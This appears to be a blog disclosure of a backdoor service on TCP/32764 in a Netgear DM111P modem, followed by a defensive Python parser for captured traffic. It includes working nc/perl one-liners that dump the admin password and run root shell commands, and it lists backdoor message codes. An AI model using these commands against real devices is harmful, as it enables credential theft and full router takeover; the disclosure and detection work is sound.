Netgear DM111P backdoor?

After reading @elvanderb‘s tweet about a backdoor in his Linksys WAG200G, I checked my Netgear DM111P DSL modem (running firmware V2.00.27_WW) and found that TCP/32764 was opened and responding in a similar way.

The admin's HTTP password is also exposed in the clear by the scfgmgr process listening on TCP/32764:

$ perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.0.1 32764 \
| perl -n0e 'chomp;print"$_\n"' \
| grep ^http_

Output:

http_username=admin
http_password=***password*in*clear***
http_timeout=5

More important is the ability to execute arbitrary shell commands as root (with a code 7 message)!

$ perl -e '$c="ps";print pack("(III)<", 0x53634d4d, 0x07, length($c)).$c' \
| nc 192.168.0.1 32764
MMcS?  PID  Uid        VSZ Stat Command
    1 root       1268 S   init       
    2 root            SW  [keventd]
    3 root            RWN [ksoftirqd_CPU0]
    4 root            SW  [kswapd]
    5 root            SW  [bdflush]
    6 root            SW  [kupdated]
    7 root            SW  [swapper]
    8 root            SW  [mtdblockd]
   55 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   56 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   57 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   65 root        628 S   /sbin/klogd 
  125 root       1148 S   dnrd -a 192.168.0.1 -m hosts -c off --timeout=0 -b 
  130 root        620 S   /usr/sbin/crond 
  131 root        652 S   /sbin/syslogd -f /etc/syslog.conf 
  133 root        868 S   /usr/sbin/scfgmgr 
  135 root        600 S   /usr/sbin/atm_monitor init 
  141 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
  142 root        596 S   /usr/sbin/cmd_agent_ap 
  143 root        596 S   /usr/sbin/pb_ap 
  137 root            SW  [autbtex]
  138 root            SW  [atm_led_complet]
  139 root            SW  [pmex_ne]
  140 root            SW  [pmex_fe]
  163 root       1268 S   init       
  165 root        672 S   /usr/sbin/mini_httpd -d /www -r NETGEAR DM111P  ADSL2
  228 root        612 S   /sbin/br2684ctld 
  755 root        996 S   /usr/sbin/scfgmgr 
  756 root       1268 S   sh -c ps 
  757 root       1272 R   ps

Further inspection:

List of message codes for the DM111P:

  • 1: Get all nvram variables (open/lseek/read on /tmp/nvram; contains PPPoE passwords, the HTTP admin password, etc.)
  • 2: Get a specific nvram variable (nvram_get)
  • 3: Set a specific nvram variable (parse string with strtok and call nvram_set)
  • 4: Commit nvram variables (nvram_commit)
  • 5: Reset WAN mode? (nvram_set wan_mode=bridge, wan_encap=0, wan_vpi=8, wan_vci=81, and finally /usr/sbin/rc wan restart&)
  • 6: Get ADSL (up|down)stream speed %dKbps/%dKbps (fopen/fscanf on /tmp/adsl/downstream and /tmp/adsl/upstream/)
  • 7: Execute arbitrary commands through popen!!!
  • 8: Write content to /tmp/%s file
  • 9: Get version from /etc/version
  • 10: Get nvram value of variable lan_ipaddr
  • 11: Restore default nvram variables (nvram_set restore_default=1)
  • 12: fopen/fseek/fread on /dev/mtdblock/5?
  • 13: nvram_load followed by nvram_commit?
  • 14: Set firmware BOOT options? (execute /usr/sbin/fw_env %s %s through a system call)
  • 20: Get WAN interface MAC address? (nvram_get wan_macaddr_def)
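As an added example (mine, not code from the post): a parser for the 12-byte scfgmgr header that turns a captured client-to-router stream on TCP/32764 into labelled messages, so a packet capture can be triaged for the dangerous codes. The severity labels are my own assumption, and the sample bytes are constructed from the two requests shown above.

```python
import struct
from typing import List, NamedTuple

# scfgmgr header on TCP/32764 as shown in the post: three little-endian uint32
# (magic, code, length). Packed, the magic 0x53634d4d is b"MMcS", as in the replies.
SCFGMGR_MAGIC = 0x53634D4D
HEADER = struct.Struct("<III")

# Message codes from the post's list; severity labels are my own assumption for triage.
CODES = {
    1: ("dump all nvram variables incl. passwords", "critical"),
    2: ("get nvram variable", "medium"),
    3: ("set nvram variable", "high"),
    4: ("commit nvram", "medium"),
    5: ("reset WAN mode", "high"),
    6: ("get ADSL line speed", "low"),
    7: ("execute shell command via popen", "critical"),
    8: ("write file under /tmp", "high"),
    9: ("get /etc/version", "low"),
    10: ("get lan_ipaddr", "low"),
    11: ("restore default nvram", "high"),
    12: ("read /dev/mtdblock/5", "high"),
    13: ("nvram_load then nvram_commit", "high"),
    14: ("set firmware boot options via fw_env", "critical"),
    20: ("get WAN MAC address", "low"),
}

Message = NamedTuple("Message", [("code", int), ("payload", bytes),
                                 ("description", str), ("severity", str)])

def parse_messages(data: bytes) -> List[Message]:
    """Split a captured client-to-router stream into scfgmgr messages; stop at
    the first header without the magic or at a truncated payload."""
    msgs: List[Message] = []
    off = 0
    while off + HEADER.size <= len(data):
        magic, code, length = HEADER.unpack_from(data, off)
        if magic != SCFGMGR_MAGIC:
            break
        start = off + HEADER.size
        payload = data[start:start + length]
        if len(payload) < length:
            break  # capture ended mid-message; do not guess the rest
        off = start + length
        desc, sev = CODES.get(code, ("unknown code", "high"))
        msgs.append(Message(code, payload, desc, sev))
    return msgs

# Constructed sample: the post's two requests back to back (code 1, then code 7 "ps").
SAMPLE = HEADER.pack(SCFGMGR_MAGIC, 1, 0) + HEADER.pack(SCFGMGR_MAGIC, 7, 2) + b"ps"
```

Any message with a code of severity "critical" seen from a LAN host toward the modem is worth an alert, since code 1 leaks the admin credentials and code 7 is root command execution.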

Update:
